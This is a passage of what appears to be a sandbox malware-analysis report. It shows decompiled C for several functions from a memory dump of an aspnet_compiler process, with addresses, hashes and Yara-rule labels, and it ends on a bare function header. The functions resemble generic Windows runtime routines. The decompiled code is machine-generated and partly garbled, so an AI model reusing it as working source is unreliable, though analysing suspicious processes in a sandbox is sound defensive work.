                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011C002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E011B7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E011B7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E011B7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E011B7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                        0x011c0032
                                                                                        0x011c0037
                                                                                        0x011c0043
                                                                                        0x01204b3a
                                                                                        0x011c0049
                                                                                        0x011c0049
                                                                                        0x011c0049
                                                                                        0x011c004e
                                                                                        0x011c0053
                                                                                        0x01204b48
                                                                                        0x01204b5a
                                                                                        0x01204b4a
                                                                                        0x01204b53
                                                                                        0x01204b53
                                                                                        0x01204b5f
                                                                                        0x00000000
                                                                                        0x01204b61
                                                                                        0x00000000
                                                                                        0x01204b61
                                                                                        0x011c0059
                                                                                        0x011c0059
                                                                                        0x011c0060
                                                                                        0x01204b6f
                                                                                        0x01204b6f
                                                                                        0x011c0069
                                                                                        0x01204b83
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204b90
                                                                                        0x01204b9b
                                                                                        0x01204b9b
                                                                                        0x01204ba4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204baa
                                                                                        0x00000000
                                                                                        0x011c006f
                                                                                        0x011c006f
                                                                                        0x00000000
                                                                                        0x011c006f
                                                                                        0x011c0069

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                        • Instruction ID: b24a6aafcb2ae035d24be6176a98c0ff702905e8ecf3c0e3eea8c20b59fba18a
                                                                                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                        • Instruction Fuzzy Hash: E1110C36A11AC2CFD71BA72CC944B3537D4AF54B94F1B01A4EF04876D3E328C851C251
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011A766D Relevance: .1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E011A766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E011CF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E011CF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L011B4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                        0x011a7672
                                                                                        0x011a767f
                                                                                        0x011a7689
                                                                                        0x011a76de
                                                                                        0x011a76de
                                                                                        0x011a768b
                                                                                        0x011a7691
                                                                                        0x011a7693
                                                                                        0x011a7697
                                                                                        0x00000000
                                                                                        0x011a7699
                                                                                        0x011a76a8
                                                                                        0x00000000
                                                                                        0x011a76aa
                                                                                        0x011a76ad
                                                                                        0x011a76b1
                                                                                        0x00000000
                                                                                        0x011a76b3
                                                                                        0x011a76b3
                                                                                        0x011a76b5
                                                                                        0x011a76ba
                                                                                        0x011a76bc
                                                                                        0x011a76bc
                                                                                        0x011a76c0
                                                                                        0x00000000
                                                                                        0x011a76c2
                                                                                        0x011a76ce
                                                                                        0x011a76ce
                                                                                        0x011a76c0
                                                                                        0x011a76b1
                                                                                        0x011a76a8
                                                                                        0x011a7697
                                                                                        0x011a76d9

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                        • Instruction ID: d22d8a33cedecdb560f17dfb506fb86c1d3f81f001c56482dfd33f9dbea14634
                                                                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                        • Instruction Fuzzy Hash: E201D832710519ABE7249E5ECC50F9B7FADEB94A60B540124FA0CCB281DB31DE45C3A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01199080 Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 69%
                                                                                        			E01199080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x12885ec;
				E011B2280(_t48, 0x12885ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E011AFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x128538c; // 0x77e16828
					if( *_t84 != 0x1285388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x126f6e8);
						E011ED0E8(0x12885ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E012688F5(_t80, _t85, 0x1285388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x12886c0; // 0xbc07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x12886b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E011B2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E012688F5(0x12885ec, _t85, 0x1285388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E011DAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x128b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x12884c0;
																			if(_t82 >=  *0x12884c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01269063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0119922A(_t99);
										_t64 = E011B7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01268B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x12886c0; // 0xbc07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x12886b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x12886bc;
													_t87 = 0x12886b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01199240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x12886c4;
												_t87 = 0x12886c0;
												L27:
												E011C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E011ED130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1285388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x128538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                        0x01199082
                                                                                        0x01199083
                                                                                        0x01199084
                                                                                        0x01199085
                                                                                        0x01199087
                                                                                        0x01199096
                                                                                        0x01199098
                                                                                        0x01199098
                                                                                        0x0119909e
                                                                                        0x011990a8
                                                                                        0x011990e7
                                                                                        0x011990e7
                                                                                        0x011990aa
                                                                                        0x011990b0
                                                                                        0x011990b7
                                                                                        0x011990bd
                                                                                        0x011990dd
                                                                                        0x011990e6
                                                                                        0x011990bf
                                                                                        0x011990bf
                                                                                        0x011990c7
                                                                                        0x011990cf
                                                                                        0x011990f1
                                                                                        0x011990f2
                                                                                        0x011990f4
                                                                                        0x011990f5
                                                                                        0x011990f6
                                                                                        0x011990f7
                                                                                        0x011990f8
                                                                                        0x011990f9
                                                                                        0x011990fa
                                                                                        0x011990fb
                                                                                        0x011990fc
                                                                                        0x011990fd
                                                                                        0x011990fe
                                                                                        0x011990ff
                                                                                        0x01199100
                                                                                        0x01199102
                                                                                        0x01199107
                                                                                        0x0119910c
                                                                                        0x01199110
                                                                                        0x01199113
                                                                                        0x01199115
                                                                                        0x01199136
                                                                                        0x0119913f
                                                                                        0x01199143
                                                                                        0x011f37e4
                                                                                        0x011f37e4
                                                                                        0x01199117
                                                                                        0x01199117
                                                                                        0x0119911d
                                                                                        0x00000000
                                                                                        0x0119911f
                                                                                        0x0119911f
                                                                                        0x01199125
                                                                                        0x00000000
                                                                                        0x01199127
                                                                                        0x0119912d
                                                                                        0x01199130
                                                                                        0x01199134
                                                                                        0x01199158
                                                                                        0x0119915d
                                                                                        0x01199161
                                                                                        0x01199168
                                                                                        0x011f3715
                                                                                        0x0119916e
                                                                                        0x0119916e
                                                                                        0x01199175
                                                                                        0x01199177
                                                                                        0x0119917e
                                                                                        0x0119917f
                                                                                        0x01199182
                                                                                        0x01199182
                                                                                        0x01199187
                                                                                        0x01199187
                                                                                        0x0119918a
                                                                                        0x0119918d
                                                                                        0x0119918f
                                                                                        0x01199192
                                                                                        0x01199195
                                                                                        0x01199198
                                                                                        0x01199198
                                                                                        0x01199198
                                                                                        0x0119919a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f371f
                                                                                        0x011f3721
                                                                                        0x011f3727
                                                                                        0x011f372f
                                                                                        0x011f3733
                                                                                        0x011f3735
                                                                                        0x011f3738
                                                                                        0x011f373b
                                                                                        0x011f373d
                                                                                        0x011f3740
                                                                                        0x00000000
                                                                                        0x011f3746
                                                                                        0x011f3746
                                                                                        0x011f3749
                                                                                        0x00000000
                                                                                        0x011f374f
                                                                                        0x011f374f
                                                                                        0x011f3751
                                                                                        0x011f3757
                                                                                        0x011f3759
                                                                                        0x011f375c
                                                                                        0x011f375c
                                                                                        0x011f375e
                                                                                        0x011f375e
                                                                                        0x011f3761
                                                                                        0x011f3764
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f3766
                                                                                        0x011f3768
                                                                                        0x011f37a3
                                                                                        0x011f37a3
                                                                                        0x011f37a5
                                                                                        0x011f37a7
                                                                                        0x011f37ad
                                                                                        0x011f37b0
                                                                                        0x011f37b2
                                                                                        0x011f37bc
                                                                                        0x011f37c2
                                                                                        0x011f37c2
                                                                                        0x011f37b2
                                                                                        0x01199187
                                                                                        0x01199187
                                                                                        0x0119918a
                                                                                        0x0119918d
                                                                                        0x0119918f
                                                                                        0x01199192
                                                                                        0x01199195
                                                                                        0x00000000
                                                                                        0x01199195
                                                                                        0x00000000
                                                                                        0x011f376a
                                                                                        0x011f376a
                                                                                        0x011f376a
                                                                                        0x011f376c
                                                                                        0x011f376c
                                                                                        0x011f376f
                                                                                        0x011f3775
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f3777
                                                                                        0x011f3779
                                                                                        0x011f3782
                                                                                        0x011f3787
                                                                                        0x011f3789
                                                                                        0x011f3790
                                                                                        0x011f3790
                                                                                        0x011f378b
                                                                                        0x011f378b
                                                                                        0x011f378b
                                                                                        0x011f3792
                                                                                        0x011f3795
                                                                                        0x00000000
                                                                                        0x011f3795
                                                                                        0x00000000
                                                                                        0x011f3779
                                                                                        0x011f3798
                                                                                        0x00000000
                                                                                        0x011f3798
                                                                                        0x00000000
                                                                                        0x011f3768
                                                                                        0x011f379b
                                                                                        0x011f379b
                                                                                        0x011f3751
                                                                                        0x011f3749
                                                                                        0x00000000
                                                                                        0x011f3740
                                                                                        0x011991a0
                                                                                        0x011991a3
                                                                                        0x011991a9
                                                                                        0x011991b0
                                                                                        0x00000000
                                                                                        0x011991b0
                                                                                        0x01199187
                                                                                        0x011991b4
                                                                                        0x011991b4
                                                                                        0x011991bb
                                                                                        0x011991c0
                                                                                        0x011991c5
                                                                                        0x011991c7
                                                                                        0x011f37da
                                                                                        0x011991cd
                                                                                        0x011991cd
                                                                                        0x011991cd
                                                                                        0x011991d2
                                                                                        0x011991d5
                                                                                        0x01199239
                                                                                        0x01199239
                                                                                        0x011991d7
                                                                                        0x011991db
                                                                                        0x011991e1
                                                                                        0x011991e7
                                                                                        0x011991fd
                                                                                        0x01199203
                                                                                        0x0119921e
                                                                                        0x01199223
                                                                                        0x00000000
                                                                                        0x01199205
                                                                                        0x01199205
                                                                                        0x01199208
                                                                                        0x0119920c
                                                                                        0x01199214
                                                                                        0x01199214
                                                                                        0x0119920c
                                                                                        0x011991e9
                                                                                        0x011991e9
                                                                                        0x011991ee
                                                                                        0x011991f3
                                                                                        0x011991f3
                                                                                        0x011991f3
                                                                                        0x011991e7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01199134
                                                                                        0x01199125
                                                                                        0x0119911d
                                                                                        0x0119914e
                                                                                        0x011990d1
                                                                                        0x011990d1
                                                                                        0x011990d3
                                                                                        0x011990d6
                                                                                        0x011990d8
                                                                                        0x00000000
                                                                                        0x011990d8
                                                                                        0x011990cf

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 87f1451b2021918a2b2e990fb053b45873f896c586172f1abd9feba58f298061
                                                                                        • Instruction ID: bd1dbef6571c0abe8dacd1657789675520da463f6fb893d855740db0c34c1fc0
                                                                                        • Opcode Fuzzy Hash: 87f1451b2021918a2b2e990fb053b45873f896c586172f1abd9feba58f298061
                                                                                        • Instruction Fuzzy Hash: E001A4725126098FD72D9F18D844B157BADFF45328F29406AE5258B691C378EC41CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0122C450 Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 46%
                                                                                        			E0122C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E011D9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E011D95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E011D95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E011D95D0();
				return L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                        0x0122c458
                                                                                        0x0122c45d
                                                                                        0x0122c466
                                                                                        0x0122c468
                                                                                        0x0122c469
                                                                                        0x0122c46a
                                                                                        0x0122c46b
                                                                                        0x0122c46e
                                                                                        0x0122c46f
                                                                                        0x0122c471
                                                                                        0x0122c476
                                                                                        0x0122c476
                                                                                        0x0122c47c
                                                                                        0x0122c47e
                                                                                        0x0122c480
                                                                                        0x0122c480
                                                                                        0x0122c483
                                                                                        0x0122c484
                                                                                        0x0122c486
                                                                                        0x0122c488
                                                                                        0x0122c48f
                                                                                        0x0122c491
                                                                                        0x0122c493
                                                                                        0x0122c493
                                                                                        0x0122c48f
                                                                                        0x0122c498
                                                                                        0x0122c49e
                                                                                        0x0122c4ad
                                                                                        0x0122c4ad
                                                                                        0x0122c4b2
                                                                                        0x0122c4b4
                                                                                        0x0122c4cd

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                        • Instruction ID: fab2e7ff3a44b1dcb36ca2fa4dfa8ea081cc0197cb45a2a30ffb51ff701b9191
                                                                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                        • Instruction Fuzzy Hash: 2D01927214051ABFE729AF69CC80EA7FB6DFF64398F404525F214465A0CB21ACA1CAA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01264015 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 86%
                                                                                        			E01264015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E011B2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E011B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x12886ac);
					E0119F900(0x12886d4, _t28);
					E011AFFB0(0x12886ac, _t28, 0x12886ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E011AFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                        0x0126401a
                                                                                        0x0126401e
                                                                                        0x01264023
                                                                                        0x01264028
                                                                                        0x01264029
                                                                                        0x0126402b
                                                                                        0x0126402f
                                                                                        0x01264043
                                                                                        0x01264046
                                                                                        0x01264051
                                                                                        0x01264057
                                                                                        0x0126405f
                                                                                        0x01264062
                                                                                        0x01264067
                                                                                        0x0126406f
                                                                                        0x0126407c
                                                                                        0x0126407c
                                                                                        0x0126408c
                                                                                        0x0126408c
                                                                                        0x01264097

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cac66fdf54934b6201b609f8ec252a6e2dfc7e29fda205b4660ba4a0282fd502
                                                                                        • Instruction ID: aab2276c1687cb9d6d495769a1bc4ff3c3346508c781df13ec1f0c9d69ae099f
                                                                                        • Opcode Fuzzy Hash: cac66fdf54934b6201b609f8ec252a6e2dfc7e29fda205b4660ba4a0282fd502
                                                                                        • Instruction Fuzzy Hash: 8301D4722019467FC619BB69CD80E57BBACFF55658B000225F508C7A91DB34EC51C6E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0125138A Relevance: .0, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 61%
                                                                                        			E0125138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x128d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E011DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E011B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                        0x0125138a
                                                                                        0x0125138a
                                                                                        0x01251399
                                                                                        0x012513a3
                                                                                        0x012513a8
                                                                                        0x012513aa
                                                                                        0x012513b5
                                                                                        0x012513bb
                                                                                        0x012513c3
                                                                                        0x012513c6
                                                                                        0x012513c9
                                                                                        0x012513d4
                                                                                        0x012513e6
                                                                                        0x012513d6
                                                                                        0x012513df
                                                                                        0x012513df
                                                                                        0x012513f1
                                                                                        0x012513f2
                                                                                        0x012513f4
                                                                                        0x012513f9
                                                                                        0x0125140e

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 23657d297e8e5f977e1726ab0edb5ae2bce5380ffdeb1b244361ae93e4cf784b
                                                                                        • Instruction ID: 5911cfda3a6af5262b2f36c078d1be3d4c64d9cb0d6b3133e4ab29d0ee1fde6c
                                                                                        • Opcode Fuzzy Hash: 23657d297e8e5f977e1726ab0edb5ae2bce5380ffdeb1b244361ae93e4cf784b
                                                                                        • Instruction Fuzzy Hash: 07019271A0021DAFCB14DFA8D881FAEBBB8EF44700F004066F901EB281D7749A01CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012514FB Relevance: .0, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 61%
